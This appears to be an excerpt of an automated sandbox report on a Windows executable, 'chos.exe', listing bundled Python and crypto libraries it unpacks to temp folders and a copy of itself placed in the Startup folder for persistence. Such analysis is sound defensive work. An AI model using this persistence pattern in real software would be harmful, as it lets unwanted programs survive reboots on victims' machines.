Source: C:\Users\user\Desktop\chos.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI74682\_cffi_backend.cp313-win_amd64.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI98882\Crypto\Cipher\_raw_arc2.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\chos.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI74682\Crypto\Util\_strxor.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI98882\Crypto\Hash\_RIPEMD160.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI98882\_sqlite3.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\chos.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI74682\VCRUNTIME140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\chos.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI74682\Crypto\PublicKey\_ed25519.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\chos.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI74682\sqlite3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI98882\Crypto\Cipher\_raw_ctr.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI98882\python3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\chos.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI74682\Crypto\Cipher\_chacha20.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\chos.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI74682\Crypto\Cipher\_raw_aes.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\chos.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI74682\_sqlite3.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI98882\_queue.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\chos.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI74682\Crypto\Cipher\_raw_ocb.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\chos.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI74682\_bz2.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI98882\Crypto\Cipher\_raw_cbc.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\chos.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI74682\Crypto\Math\_modexp.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI98882\_lzma.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI98882\_ssl.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI98882\pyexpat.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI98882\Crypto\Hash\_MD2.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI98882\Crypto\Cipher\_raw_des.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\chos.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI74682\Crypto\Hash\_SHA1.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI98882\_socket.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI98882\Crypto\Cipher\_raw_ecb.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI98882\Crypto\Cipher\_raw_des3.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI98882\Crypto\Protocol\_scrypt.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\chos.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI74682\_multiprocessing.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI98882\Crypto\Hash\_keccak.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI98882\Crypto\Cipher\_raw_cast.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI98882\Crypto\Util\_cpuid_c.pyd	Jump to dropped file

Source: C:\Users\user\Desktop\chos.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI74682\setuptools\_vendor\wheel-0.43.0.dist-info\LICENSE.txt			Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI98882\setuptools\_vendor\wheel-0.43.0.dist-info\LICENSE.txt			Jump to behavior

Boot Survival

Drops PE files to the startup folder

Source: C:\Users\user\Desktop\chos.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe

Jump to dropped file

Source: C:\Users\user\Desktop\chos.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe

Jump to behavior

Source: C:\Users\user\Desktop\chos.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe

Jump to behavior

Source: C:\Users\user\Desktop\chos.exe

Code function: 0_2_00007FF666DD5820 GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,

0_2_00007FF666DD5820

Source: C:\Windows\System32\tasklist.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Process information set: NOOPENFILEERRORBOX

Source: C:\Users\user\Desktop\chos.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI74682\Crypto\Hash\_BLAKE2b.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\chos.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI74682\Crypto\Cipher\_raw_arc2.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI98882\charset_normalizer\md.cp313-win_amd64.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\chos.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI74682\Crypto\Cipher\_raw_cbc.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI98882\Crypto\Hash\_SHA1.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\chos.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI74682\_ctypes.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\chos.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI74682\_ssl.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI98882\Crypto\Hash\_MD4.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\chos.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI74682\Crypto\Hash\_ghash_portable.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI98882\Crypto\Hash\_ghash_portable.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\chos.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI74682\Crypto\Hash\_MD5.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\chos.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI74682\_lzma.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\chos.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI74682\charset_normalizer\md.cp313-win_amd64.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI98882\Crypto\Math\_modexp.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI98882\python313.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI98882\_decimal.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI98882\_cffi_backend.cp313-win_amd64.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\chos.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI74682\Crypto\Hash\_SHA256.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\chos.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI74682\_overlapped.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI98882\Crypto\Cipher\_ARC4.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI98882\Crypto\Cipher\_Salsa20.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI98882\Crypto\Hash\_SHA512.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI98882\Crypto\PublicKey\_curve25519.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\chos.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI74682\_decimal.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\chos.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI74682\Crypto\Hash\_SHA384.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\chos.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI74682\Crypto\Cipher\_raw_ctr.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\chos.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI74682\Crypto\Cipher\_raw_cfb.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI98882\Crypto\PublicKey\_ed25519.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\chos.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI74682\Crypto\Protocol\_scrypt.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\chos.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI74682\Crypto\Cipher\_raw_cast.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI98882\_bz2.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI98882\Crypto\PublicKey\_ed448.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\chos.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI74682\Crypto\PublicKey\_ec_ws.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI98882\_overlapped.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\chos.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI74682\_uuid.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\chos.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI74682\Crypto\Cipher\_raw_des.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\chos.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI74682\select.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\chos.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI74682\Crypto\Hash\_SHA224.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI98882\_uuid.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\chos.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI74682\python313.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI98882\Crypto\Util\_strxor.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\chos.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI74682\pyexpat.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\chos.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI74682\cryptography\hazmat\bindings\_rust.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\chos.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI74682\Crypto\Cipher\_raw_ecb.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI98882\Crypto\Cipher\_raw_cfb.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI98882\Crypto\Hash\_BLAKE2b.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\chos.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI74682\Crypto\Hash\_RIPEMD160.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\chos.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI74682\Crypto\Hash\_MD2.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\chos.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI74682\Crypto\Cipher\_raw_blowfish.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI98882\Crypto\Cipher\_raw_blowfish.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\chos.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI74682\Crypto\Cipher\_raw_aesni.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI98882\Crypto\Cipher\_raw_aesni.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI98882\Crypto\Hash\_ghash_clmul.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\chos.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI74682\Crypto\Hash\_ghash_clmul.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\chos.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI74682\Crypto\PublicKey\_curve25519.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI98882\Crypto\Cipher\_raw_ofb.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\chos.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI74682\Crypto\PublicKey\_ed448.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI98882\Crypto\Cipher\_raw_ocb.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI98882\_asyncio.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\chos.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI74682\Crypto\Cipher\_raw_eksblowfish.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI98882\Crypto\PublicKey\_ec_ws.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\chos.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI74682\Crypto\Hash\_keccak.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI98882\Crypto\Cipher\_raw_aes.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI98882\_ctypes.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI98882\_multiprocessing.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI98882\Crypto\Hash\_MD5.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI98882\_hashlib.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\chos.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI74682\Crypto\Hash\_MD4.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI98882\Crypto\Hash\_SHA384.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\chos.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI74682\Crypto\Cipher\_pkcs1_decode.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\chos.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI74682\_queue.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI98882\Crypto\Hash\_poly1305.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\chos.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI74682\Crypto\Cipher\_Salsa20.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI98882\Crypto\PublicKey\_curve448.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI98882\Crypto\Cipher\_pkcs1_decode.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\chos.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI74682\Crypto\Hash\_SHA512.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\chos.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI74682\_asyncio.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI98882\_wmi.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI98882\Crypto\Cipher\_chacha20.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI98882\Crypto\Cipher\_raw_eksblowfish.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\chos.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI74682\Crypto\Cipher\_raw_ofb.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\chos.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI74682\unicodedata.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI98882\Crypto\Hash\_BLAKE2s.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\chos.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI74682\_socket.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\chos.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI74682\charset_normalizer\md__mypyc.cp313-win_amd64.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\chos.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI74682\Crypto\Hash\_BLAKE2s.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\chos.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI74682\_wmi.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\chos.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI74682\Crypto\Cipher\_ARC4.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\chos.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI74682\Crypto\PublicKey\_curve448.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\chos.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI74682\python3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI98882\Crypto\Hash\_SHA256.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI98882\unicodedata.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI98882\cryptography\hazmat\bindings\_rust.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\chos.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI74682\Crypto\Hash\_poly1305.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI98882\Crypto\Hash\_SHA224.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\chos.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI74682\_hashlib.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI98882\charset_normalizer\md__mypyc.cp313-win_amd64.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI98882\select.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\chos.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI74682\Crypto\Cipher\_raw_des3.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\chos.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI74682\Crypto\Util\_cpuid_c.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\chos.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI74682\_cffi_backend.cp313-win_amd64.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI98882\Crypto\Cipher\_raw_arc2.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\chos.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI74682\Crypto\Util\_strxor.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI98882\Crypto\Hash\_RIPEMD160.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI98882\_sqlite3.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI98882\Crypto\Cipher\_raw_ctr.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\chos.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI74682\Crypto\PublicKey\_ed25519.pyd	Jump to dropped file
